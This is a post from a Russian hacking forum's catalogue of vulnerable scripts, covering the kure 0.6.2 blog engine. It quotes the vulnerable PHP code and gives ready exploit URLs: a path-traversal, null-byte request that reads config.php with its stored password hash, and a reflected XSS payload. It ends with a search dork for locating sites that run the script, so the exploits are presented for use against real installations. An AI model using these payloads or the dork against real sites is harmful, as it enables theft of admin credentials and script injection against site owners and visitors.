Форум АНТИЧАТ - Показать сообщение отдельно - Энциклопедия уязвимых скриптов

kure 0.6.2

Читалка
/config.php

PHP код:

...$config = "21232f297a57a5a743894a0e4a801fc3";...

/index.php

PHP код:

.../***** VIEWPOST/VIEWDOC *****/ elseif(isset($_GET['post']) || isset($_GET['doc'])) { // if a post/doc has been requested if(isset($_GET['post'])) { $type = "post"; $filename = $_GET['post']; } else { $type = "doc"; $filename = $_GET['doc']; } plug($type, "top"); if(!file_exists($type . "s/" . $filename . ".txt")) { print("The requested file <tt>" . $type . "s/" . $filename . ".txt</tt> does not exist.\n"); } else { $file = $type . "s/" . $filename . ".txt"; $title = $file; $title = str_replace($type . "s/", "", $title); $title = str_replace(".txt", "", $title); $uftitle = $title; $title = str_replace("_", " ", $title); $content = str_replace("\n", " \n", file_get_contents($file)); print("<table align=\"center\" width=\"90%\"><tr>\n"); print("<td width=\"100%\">\n"); print("<a class=\"blog_title\" href=\"?" . $type . "=" . $uftitle . "\" name=\"" . $title . "\">" . $title . "</a>\n"); plug($type, "title_after"); print(" \n"); if(($type == "doc" && $config['docdates'] == true) || $type == "post") { print("" . date("F jS, Y", filemtime($file)) . "\n"); plug($type, "date_after"); print(" \n"); } print("</td></tr>\n"); print("<tr><td width=\"100%\"> \n"); print("\n" . $content . "\n"); plug($type, "body_after"); print(" \n"); print("</td></tr>\n"); print("</table>\n"); } }...

Result:
http://localhost/kure-0.6.2/index.php?post=../config.php%00

админко - admin/

пасивная XSS
/index.php

PHP код:

...plug($type, "top"); if(!file_exists($type . "s/" . $filename . ".txt")) { print("The requested file <tt>" . $type . "s/" . $filename . ".txt</tt> does not exist.\n");...

Result:
http://localhost/kure-0.6.2/index.php?post=%3Cscript%3Ealert%28123%29%3C/script%3E

Дорк: powered by kure